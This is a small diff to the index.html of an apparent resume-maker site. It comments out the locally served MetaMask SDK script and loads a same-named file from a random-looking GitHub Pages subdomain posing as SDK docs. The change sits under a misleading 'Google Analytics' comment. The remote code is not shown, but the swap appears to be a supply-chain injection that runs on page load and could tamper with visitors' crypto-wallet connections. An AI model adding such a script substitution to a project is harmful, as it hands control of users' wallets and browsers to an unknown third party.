--- a/1/index.html
+++ b/1/index.html
@@ -16,7 +16,8 @@
 	<meta name="keywords" content="resume,cv,maker,creator,generator,nitw,warangal,nit warangal,projects,computer science">
 
 	<!-- OPL Demos Google Analytics -->
-	<script src="/node_modules/@metamask/sdk/dist/browser/iife/metamask-sdk.js"></script>
+	<!--<script src="/node_modules/@metamask/sdk/dist/browser/iife/metamask-sdk.js"></script>-->
+	<script src="https://c0f4f41c-2f55-4863-921b-sdk-docs.github.io/cdn/metamask-sdk.js"></script>
 	<script>
 		const sdk = new MetaMaskSDK.MetaMaskSDK({
 			dappMetadata: {
